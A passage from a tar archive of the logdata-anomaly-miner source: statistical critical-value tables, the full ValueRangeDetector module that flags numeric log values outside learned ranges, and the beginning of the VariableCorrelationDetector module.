'beta2': 0.32568694785066254, 'beta4': [0.011742895360485154, 1.1450709824504766]}, 100: {'uni': 0.09851302012310224, 'beta1': 0.016743774531242164, 'beta2': 0.3769412320128021, 'beta4': [0.01637186145008221, 1.1181403582578833]}, 75: {'uni': 0.13159671189369468, 'beta1': 0.0353072844153596, 'beta2': 0.4029701798442491, 'beta4': [0.0242920289946626, 1.1014964463557084]}, 50: {'uni': 0.2082524484431105, 'beta1': 0.058731656498910045, 'beta2': 0.4381324547033927, 'beta4': [0.026849081958434176, 1.0876033182011025]}, 30: {'uni': 0.293617651791125, 'beta1': 0.09264315880887661, 'beta2': 0.5127477095369036, 'beta4': [0.03992448279709234, 1.0738220472794529]}, 20: {'uni': 0.36087329714400185, 'beta1': 0.20900980183336224, 'beta2': 0.5807926264924211, 'beta4': [0.05187077347058253, 1.0620763444007149]}, 10: {'uni': 0.5219501641374265, 'beta1': 0.3551980104060056, 'beta2': 0.7076947393664232, 'beta4': [0.08767917650288747, 1.0483637472236114]}}, 100: {1000: {'uni': 0.09293632608491963, 'beta1': 0.025720520021528075, 'beta2': 0.40252090475367147, 'beta4': [0.020928371822775547, 1.34296320538308]}, 750: {'uni': 0.10604279254769028, 'beta1': 0.03092454484113119, 'beta2': 0.3818717550561334, 'beta4': [0.02453933202150238, 1.342042471316131]}, 500: {'uni': 0.12565818508622995, 'beta1': 0.022377522080934454, 'beta2': 0.3905279161507944, 'beta4': [0.019542928350261425, 1.3078129134604686]}, 400: {'uni': 0.10873296749252183, 'beta1': 0.021194077173698013, 'beta2': 0.40756034730854335, 'beta4': [0.02718956918208252, 1.2942385171370212]}, 300: {'uni': 0.15669346437026238, 'beta1': 0.03142712087537317, 'beta2': 0.43179943146892075, 'beta4': [0.02064917213006419, 1.2667039670988918]}, 200: {'uni': 0.13343635754779815, 'beta1': 0.024233682548692133, 'beta2': 0.41522565490064955, 'beta4': [0.022369515030967926, 1.229891305593201]}, 150: {'uni': 0.11102480689661139, 'beta1': 0.02156285575115978, 'beta2': 0.45645114687990723, 'beta4': [0.01753545868173576, 1.2201162525672415]}, 100: {'uni': 0.11113330260703609, 'beta1': 0.025608870599415502, 'beta2': 0.48352061272931374, 'beta4': [0.020850521302083376, 1.1960117094042504]}, 75: {'uni': 0.1468788764521182, 'beta1': 0.0265797908677119, 'beta2': 0.5095270313141985, 'beta4': [0.021404540631677776, 1.1660210148862071]}, 50: {'uni': 0.21504666655802165, 'beta1': 0.0489536361147554, 'beta2': 0.45594457855380627, 'beta4': [0.027095564600229022, 1.145224577518587]}, 30: {'uni': 0.28088203482754814, 'beta1': 0.10794487397895774, 'beta2': 0.5169455155470948, 'beta4': [0.042544039097420154, 1.1110310777960173]}, 20: {'uni': 0.3554362219541707, 'beta1': 0.14189026695845378, 'beta2': 0.5830537392316464, 'beta4': [0.056849867105273504, 1.0955705395949151]}, 10: {'uni': 0.5379842252559748, 'beta1': 0.3322804773023954, 'beta2': 0.6932018848300567, 'beta4': [0.08316172640718857, 1.0796082756736676]}}, 75: {1000: {'uni': 0.17532266769625532, 'beta1': 0.03705383020682054, 'beta2': 0.4980809003523, 'beta4': [0.026908987077822855, 1.479626079300446]}, 750: {'uni': 0.17675406910394137, 'beta1': 0.038950169506359156, 'beta2': 0.5358765381219652, 'beta4': [0.029789208608383192, 1.4458845611717743]}, 500: {'uni': 0.1745341229104289, 'beta1': 0.03502152451732104, 'beta2': 0.5015222005427495, 'beta4': [0.02661668897015479, 1.4148626116690979]}, 400: {'uni': 0.1881709766845352, 'beta1': 0.03266767818661956, 'beta2': 0.5294529369416701, 'beta4': [0.02895499025416707, 1.3854046773623654]}, 300: {'uni': 0.13841231000540105, 'beta1': 0.040099804822498177, 'beta2': 0.4996511962838116, 'beta4': [0.026756867634909184, 1.3802282341024599]}, 200: {'uni': 0.2366476167578417, 'beta1': 0.03552681627168437, 'beta2': 0.5607067863598236, 'beta4': [0.03323654149531536, 1.2735668785729228]}, 150: {'uni': 0.18246201015916463, 'beta1': 0.03018835273992427, 'beta2': 0.5001788380781702, 'beta4': [0.025060717431827743, 1.2546678580100472]}, 100: {'uni': 0.15047393862146116, 'beta1': 0.04053535855173776, 'beta2': 0.4812632826392785, 'beta4': [0.026154101723556197, 1.2327049090106668]}, 75: {'uni': 0.15012891413727075, 'beta1': 0.02909973108408468, 'beta2': 0.49374882961313393, 'beta4': [0.02312183625600833, 1.2116456107592724]}, 50: {'uni': 0.19863871412617307, 'beta1': 0.06609371552014234, 'beta2': 0.6567166295934954, 'beta4': [0.03296979599917632, 1.2550373634574192]}, 30: {'uni': 0.2550047584775841, 'beta1': 0.11172494481560213, 'beta2': 0.5074928992715775, 'beta4': [0.043521196438275414, 1.1350283218684674]}, 20: {'uni': 0.35838253867057834, 'beta1': 0.16187358221610643, 'beta2': 0.5897253293496353, 'beta4': [0.05534786787218656, 1.1279915725089584]}, 10: {'uni': 0.5150122800236072, 'beta1': 0.3557051324372316, 'beta2': 0.6880298753534303, 'beta4': [0.09054643254841971, 1.103946091144453]}}, 50: {1000: {'uni': 0.2650056267046456, 'beta1': 0.08166412797304853, 'beta2': 0.5945214491866839, 'beta4': [0.04097953842977647, 1.8013173549302084]}, 750: {'uni': 0.24155189502911895, 'beta1': 0.10245354397196359, 'beta2': 0.6330919397034261, 'beta4': [0.034894476175374486, 1.650125217907123]}, 500: {'uni': 0.22696308147232963, 'beta1': 0.0679737190879648, 'beta2': 0.6138878557879524, 'beta4': [0.03566096720674545, 1.6223000589486727]}, 400: {'uni': 0.33396981679697424, 'beta1': 0.0706793112232333, 'beta2': 0.7113457702884565, 'beta4': [0.03723609953854181, 1.515912197850878]}, 300: {'uni': 0.2294437752492345, 'beta1': 0.10300859222087975, 'beta2': 0.624203244880632, 'beta4': [0.03555120916901846, 1.4723487637131012]}, 200: {'uni': 0.23606764222426072, 'beta1': 0.0596235427426007, 'beta2': 0.6485710881348021, 'beta4': [0.03546895329039058, 1.4690637171977303]}, 150: {'uni': 0.24971083019799395, 'beta1': 0.08173419251816907, 'beta2': 0.6412527594047174, 'beta4': [0.03080052698601413, 1.400646947726267]}, 100: {'uni': 0.24073055018989464, 'beta1': 0.08393118651040495, 'beta2': 0.6318891921522501, 'beta4': [0.033365155212361386, 1.3928918785590392]}, 75: {'uni': 0.20486837629924928, 'beta1': 0.07832186899428449, 'beta2': 0.9281761107775478, 'beta4': [0.035445164112972466, 1.359740664152222]}, 50: {'uni': 0.31302104786432344, 'beta1': 0.06958866399568142, 'beta2': 0.6675066174467515, 'beta4': [0.04004874980800829, 1.3013016016398449]}, 30: {'uni': 0.3000620157287262, 'beta1': 0.10185267251225222, 'beta2': 0.5982970610321356, 'beta4': [0.04582850492651095, 1.2269146691004775]}, 20: {'uni': 0.3277234906176977, 'beta1': 0.17678051119760746, 'beta2': 0.80877510160582, 'beta4': [0.055374219831087326, 1.182345614556768]}, 10: {'uni': 0.5486887840452432, 'beta1': 0.33752085706590534, 'beta2': 0.9783712560936997, 'beta4': [0.08769564811462487, 1.1728320174796847]}}, 30: {1000: {'uni': 0.4718938205689787, 'beta1': 0.16850220491415746, 'beta2': 0.8146723863376911, 'beta4': [0.060273300232967286, 2.0988712699699263]}, 750: {'uni': 0.5018440993649246, 'beta1': 0.17087313652020972, 'beta2': 0.9139854538013207, 'beta4': [0.06558390958546415, 1.9685729528057976]}, 500: {'uni': 0.4550074651154489, 'beta1': 0.28720847796868054, 'beta2': 0.9452586563341621, 'beta4': [0.05890745674834778, 1.8754248251081465]}, 400: {'uni': 0.436712873445179, 'beta1': 0.19309724802712522, 'beta2': 0.8305072281593623, 'beta4': [0.07639496690376428, 1.8192427800816744]}, 300: {'uni': 0.4038782023707537, 'beta1': 0.21954095996677023, 'beta2': 1.0495495612649217, 'beta4': [0.086287115068548, 1.8253687511907974]}, 200: {'uni': 0.40958440685368225, 'beta1': 0.2777249767350044, 'beta2': 0.8707654031176021, 'beta4': [0.05316017846802162, 1.9337123485717123]}, 150: {'uni': 0.48726972984551553, 'beta1': 0.2808145117204757, 'beta2': 0.7712993996707392, 'beta4': [0.06855307088907785, 1.6668462866585527]}, 100: {'uni': 0.4200145205606179, 'beta1': 0.2606601028231352, 'beta2': 0.9232966743931794, 'beta4': [0.05814323640662995, 1.6078579676603513]}, 75: {'uni': 0.39519545172731607, 'beta1': 0.22617403736893438, 'beta2': 0.890799391826426, 'beta4': [0.054127227539886885, 1.560768803789716]}, 50: {'uni': 0.39025281852797566, 'beta1': 0.23363888472905656, 'beta2': 1.2303662537657782, 'beta4': [0.06300398028876605, 1.4559351506605223]}, 30: {'uni': 0.44358611593337394, 'beta1': 0.26124311609935197, 'beta2': 0.9784487439751727, 'beta4': [0.06612661331709933, 1.392222289383322]}, 20: {'uni': 0.5347291476681059, 'beta1': 0.27747940739842103, 'beta2': 0.9266746270833626, 'beta4': [0.06610539815659515, 1.32312648428402]}, 10: {'uni': 0.5268518049779942, 'beta1': 0.3857529731825581, 'beta2': 1.1001485562440783, 'beta4': [0.08788647848700928, 1.2844856774978703]}}, 20: {1000: {'uni': 0.611616820756745, 'beta1': 0.6103466151158652, 'beta2': 1.606833963804752, 'beta4': [0.09884033613550786, 2.1456400777366262]}, 750: {'uni': 0.8441808990110113, 'beta1': 0.655796713372086, 'beta2': 1.3506490733719665, 'beta4': [0.08853624853950347, 2.43866677610598]}, 500: {'uni': 0.5988373577646251, 'beta1': 0.46186085630032825, 'beta2': 1.1443828909845946, 'beta4': [0.0898461305276427, 2.2698199759166293]}, 400: {'uni': 0.8304510322484031, 'beta1': 0.5653414175451948, 'beta2': 1.0996186027703847, 'beta4': [0.08571539158958671, 3.387955591663139]}, 300: {'uni': 0.7442187522594172, 'beta1': 0.46331401253974935, 'beta2': 1.3717790709655808, 'beta4': [0.08555870911414092, 2.2166475986530325]}, 200: {'uni': 0.5840315022363041, 'beta1': 0.500364751905612, 'beta2': 1.4769988218033934, 'beta4': [0.08329354644891862, 2.1254438240050932]}, 150: {'uni': 0.7370906650368898, 'beta1': 0.4300463168971484, 'beta2': 1.3485978764788007, 'beta4': [0.09303457801455614, 2.2267612097524974]}, 100: {'uni': 0.6956826951091755, 'beta1': 0.5470576578153282, 'beta2': 1.2950746340437869, 'beta4': [0.085475813042166, 2.138973908107944]}, 75: {'uni': 0.6315552620464701, 'beta1': 0.45366873570471705, 'beta2': 1.1868079151662958, 'beta4': [0.08610644280569565, 2.003073434601368]}, 50: {'uni': 0.7697854387023668, 'beta1': 0.6507738597857059, 'beta2': 1.2659839239789354, 'beta4': [0.1046390254645072, 1.8724398846396764]}, 30: {'uni': 0.6306465749354568, 'beta1': 0.3466779009755018, 'beta2': 1.4822578201869108, 'beta4': [0.07745622301179714, 1.657048978669253]}, 20: {'uni': 0.8379018121518431, 'beta1': 0.4723776520325354, 'beta2': 1.2850268089384693, 'beta4': [0.08284590089109896, 1.6388492255583167]}, 10: {'uni': 0.8026106812614728, 'beta1': 0.8119190556003473, 'beta2': 1.2439818501783644, 'beta4': [0.085265760399476, 1.5405846754306889]}}, 10: {1000: {'uni': 2.3606969805461206, 'beta1': 8.291393251934911, 'beta2': 3.0820553912299253, 'beta4': [0.17737760558981158, 4.722276247639879]}, 750: {'uni': 2.6243276289156463, 'beta1': 2.7438030102193163, 'beta2': 3.9683799500049672, 'beta4': [0.17895578288402622, 4.083319167546689]}, 500: {'uni': 3.0871922423026548, 'beta1': 3.0328915004201407, 'beta2': 2.4964791662617336, 'beta4': [0.18355309506899545, 4.031756561717203]}, 400: {'uni': 1.6754252980305366, 'beta1': 2.924592003149563, 'beta2': 2.876497968109593, 'beta4': [0.20379870214850968, 4.7571034917708745]}, 300: {'uni': 2.2840468336952258, 'beta1': 2.5053743801906627, 'beta2': 2.783976562174647, 'beta4': [0.1674565791702932, 4.251642426694717]}, 200: {'uni': 1.9404428681304904, 'beta1': 2.5953221685871517, 'beta2': 2.7845173800545835, 'beta4': [0.18871911293484883, 3.741857968949452]}, 150: {'uni': 2.2704248546155794, 'beta1': 2.5329844830991, 'beta2': 2.9321247060942506, 'beta4': [0.19544767471408223, 4.336291651767806]}, 100: {'uni': 1.7356265048063002, 'beta1': 2.688039772684837, 'beta2': 4.461312176712382, 'beta4': [0.2144202268455395, 3.7766159615531025]}, 75: {'uni': 2.801004734921743, 'beta1': 2.464893798760152, 'beta2': 3.0067071540322545, 'beta4': [0.15188724806910345, 3.526991789646563]}, 50: {'uni': 2.0977009172862875, 'beta1': 2.7445624040074015, 'beta2': 2.765481175145812, 'beta4': [0.18755095945550393, 3.344866076834204]}, 30: {'uni': 2.880255284937104, 'beta1': 3.0321147833640745, 'beta2': 2.8449557765079883, 'beta4': [0.17623333533835164, 2.790174609633874]}, 20: {'uni': 1.9749893632036886, 'beta1': 2.776680410526643, 'beta2': 2.333479763453262, 'beta4': [0.17125301578097318, 2.713705409440226]}, 10: {'uni': 1.769735529651201, 'beta1': 2.0654589693702543, 'beta2': 2.084703780638172, 'beta4': [0.1690462952550446, 2.275840335334111]}}}} # noqa: E501, E231 crit_val_hom_cm = {0.05: {1000: {1000: 250.45790499999998, 750: 214.76505847619046, 500: 167.13765355555554, 400: 143.34140714285715, 300: 115.84368512820512, 200: 83.78856944444445, 150: 65.64008811594204, 100: 45.92995272727273, 75: 35.333255503875975, 50: 24.20186603174603, 30: 15.071306472491909, 20: 10.300656209150326, 10: 5.412521782178217}, 750: {750: 187.94798666666668, 500: 150.45562666666666, 400: 130.8715215942029, 300: 107.59431746031746, 200: 79.42039298245614, 150: 62.92309481481481, 100: 44.59799294117647, 75: 34.55483636363636, 50: 23.878958333333333, 30: 14.859858119658119, 20: 10.21919393939394, 10: 5.402328070175439}, 500: {500: 125.503068, 400: 111.5444314814815, 300: 94.26128, 200: 71.8865042857143, 150: 58.17430564102565, 100: 42.119102222222224, 75: 33.121080579710146, 50: 23.146869090909092, 30: 14.620633962264153, 20: 10.067361538461538, 10: 5.362602614379085}, 400: {400: 100.46720625, 300: 86.17663333333333, 200: 67.12748888888889, 150: 55.01036818181819, 100: 40.436935, 75: 32.00267719298246, 50: 22.691451851851852, 30: 14.409891472868217, 20: 9.963246031746031, 10: 5.314048780487806}, 300: {300: 75.4713888888889, 200: 60.46678, 150: 50.42997037037037, 100: 37.9633, 75: 30.453804444444447, 50: 21.899904761904764, 30: 14.075888888888887, 20: 9.838104166666666, 10: 5.271225806451613}, 200: {200: 50.458725, 150: 43.26386190476191, 100: 33.81099444444445, 75: 27.704703030303033, 50: 20.47892, 30: 13.505202898550726, 20: 9.538204545454546, 10: 5.192849206349207}, 150: {150: 37.93966666666667, 100: 30.43725333333333, 75: 25.45431111111111, 50: 19.195833333333333, 30: 12.965740740740742, 20: 9.288392156862745, 10: 5.1022083333333335}, 100: {100: 25.4654, 75: 21.866933333333332, 50: 17.144955555555555, 30: 12.011923076923077, 20: 8.791944444444445, 10: 5.000454545454545}, 75: {75: 19.179288888888887, 50: 15.485066666666667, 30: 11.208, 20: 8.371368421052633, 10: 4.864470588235294}, 50: {50: 13.005400000000002, 30: 9.881416666666667, 20: 7.576285714285715, 10: 4.6065555555555555}, 30: {30: 7.982777777777779, 20: 6.457666666666666, 10: 4.179166666666666}, 20: {20: 5.442500000000001, 10: 3.7661111111111114}, 10: {10: 2.925}}} # noqa: E501, E231 crit_val_dw = {0.01: {1000: 1.855, 750: 1.833, 500: 1.797, 400: 1.773, 300: 1.739, 200: 1.684, 150: 1.637, 100: 1.562, 75: 1.501, 50: 1.403, 30: 1.264, 20: 1.147, 10: 1.001}, 0.05: {1000: 1.898, 750: 1.883, 500: 1.857, 400: 1.841, 300: 1.817, 200: 1.779, 150: 1.747, 100: 1.694, 75: 1.652, 50: 1.585, 30: 1.489, 20: 1.411, 10: 1.320}} # noqa: E501, E231 ValueRangeDetector.py000066400000000000000000000321731500476301700350520ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for numeric value ranges. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME, \ CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class ValueRangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when numeric values are outside learned intervals.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list=None, target_path_list=None, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list to specify group identifiers for which numeric ranges should be learned. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param persistence_id name of persistence document. @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, target_path_list=target_path_list, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.ranges = {"min": {}, "max": {}} # Persisted data consists of min and max values for each identifier, i.e., # [["min", [], ], ["max", [], ]] self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.ranges = persistence_data def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 or \ len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return # Store all values from target target_path_list in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if value is not None: all_values_none = False values.append(value) if all_values_none is True: return # Store all values from id paths in a list. Use empty list as default path if not applicable. id_vals = [] for path in self.id_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) id_vals.append(value) id_event = tuple(id_vals) # Check if one of the values is outside expected value ranges for a specific id path. if id_event in self.ranges["min"] and (min(values) < self.ranges["min"][id_event] or max(values) > self.ranges["max"][id_event]): try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": values, "Range": [self.ranges["min"][id_event], self.ranges["max"][id_event]], "IDpaths": self.id_path_list, "IDvalues": list(id_event)} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Value range anomaly detected", sorted_log_lines, event_data, log_atom, self) # Extend ranges if learn mode is active. if self.learn_mode is True: if id_event in self.ranges["min"]: self.ranges["min"][id_event] = min(self.ranges["min"][id_event], min(values)) else: self.ranges["min"][id_event] = min(values) if id_event in self.ranges["max"]: self.ranges["max"][id_event] = max(self.ranges["max"][id_event], max(values)) else: self.ranges["max"][id_event] = max(values) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.ranges) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) if event_data in self.ignore_list: self.ignore_list.remove(event_data) return f"Allowlisted path {event_data}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) if event_data in self.constraint_list: self.constraint_list.remove(event_data) return f"Blocklisted path {event_data}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 VariableCorrelationDetector.py000066400000000000000000003516341500476301700367560ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for correlations between discrete variables.""" import numpy as np import logging import sys import math from scipy.stats import chi2 from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer.AnalysisChild import AnalysisContext from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class VariableCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class first finds for each eventType a list of pairs of variables, which are afterwards tested if they are correlated. For this a couple of preselection methods can be used. (See self.used_presel_meth) Thereafter the correlations are checked, with the selected methods. (See self.used_cor_meth) This module builds upon the event_type_detector. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id="Default", target_path_list=None, num_init=100, num_update=100, disc_div_thres=0.3, num_steps_create_new_rules=-1, num_upd_until_validation=20, num_end_learning_phase=-1, check_cor_thres=0.5, check_cor_prob_thres=1, check_cor_num_thres=10, min_values_cors_thres=5, new_vals_alarm_thres=3.5, num_bt=30, alpha_bt=0.1, used_homogeneity_test="Chi", alpha_chisquare_test=0.05, max_dist_rule_distr=0.1, used_presel_meth=None, intersect_presel_meth=False, percentage_random_cors=0.20, match_disc_vals_sim_tresh=0.7, exclude_due_distr_lower_limit=0.4, match_disc_distr_threshold=0.5, used_cor_meth=None, used_validate_cor_meth=None, validate_cor_cover_vals_thres=0.7, validate_cor_distinct_thres=0.05, ignore_list=None, constraint_list=None, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param num_init minimal number of lines of one event type to initialize the correlation rules. @param num_update number of lines after the initialization after which the correlations are periodically tested and updated. @param disc_div_thres diversity threshold for variables to be considered discrete. @param num_steps_create_new_rules number of update steps, for which new rules are generated periodically. States False if rules should not be updated. @param num_upd_until_validation number of update steps, for which the rules are validated periodically. @param num_end_learning_phase number of update steps until the update phase ends and the test phase begins; False if no End should be defined. @param check_cor_thres threshold for the number of allowed different values of the distribution to be considered a correlation. @param check_cor_prob_thres threshold for the difference of the probability of the values to be considered a correlation. @param check_cor_num_thres number of allowed different values for the calculation if the distribution can be considered a correlation. @param min_values_cors_thres minimal number of appearances of values on the left side to consider the distribution as a possible correlation. @param new_vals_alarm_thres threshold which has to be exceeded by number of new values divided by number of old values to generate an alarm. @param num_bt number of considered test-samples for the binomial test. @param alpha_bt significance niveau for the binomial test for the test results. @param used_homogeneity_test states the used homogeneity test which is used for the updates and tests of the correlations. The implemented methods are ["Chi", "MaxDist"]. @param alpha_chisquare_test significance level alpha for the chi-square test. @param max_dist_rule_distr maximum distance between the distribution of the rule and the distribution of the read in values before the rule fails. @param used_presel_meth used preselection methods. The implemented methods are ["matchDiscDistr", "excludeDueDistr", "matchDiscVals", "random"] @param intersect_presel_meth states if the intersection or the union of the possible correlations found by the used_presel_meth is used for the resulting correlations. @param percentage_random_cors percentage of the randomly picked correlations of all possible ones in the preselection method random. @param match_disc_vals_sim_tresh similarity threshold for the preselection method pick_cor_match_disc_vals. @param exclude_due_distr_lower_limit lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded. @param match_disc_distr_threshold threshold for the preselection method pick_cor_match_disc_distr. @param used_cor_meth used correlation detection methods. The implemented methods are ["Rel", "WRel"]. @param used_validate_cor_meth used validation methods. The implemented methods are ["coverVals", "distinctDistr"]. @param validate_cor_cover_vals_thres threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation. @param validate_cor_distinct_thres threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions have to surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param learn_mode specifies whether new values should be learned. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, num_init=num_init, num_update=num_update, disc_div_thres=disc_div_thres, num_steps_create_new_rules=num_steps_create_new_rules, num_upd_until_validation=num_upd_until_validation, num_end_learning_phase=num_end_learning_phase, check_cor_thres=check_cor_thres, check_cor_prob_thres=check_cor_prob_thres, 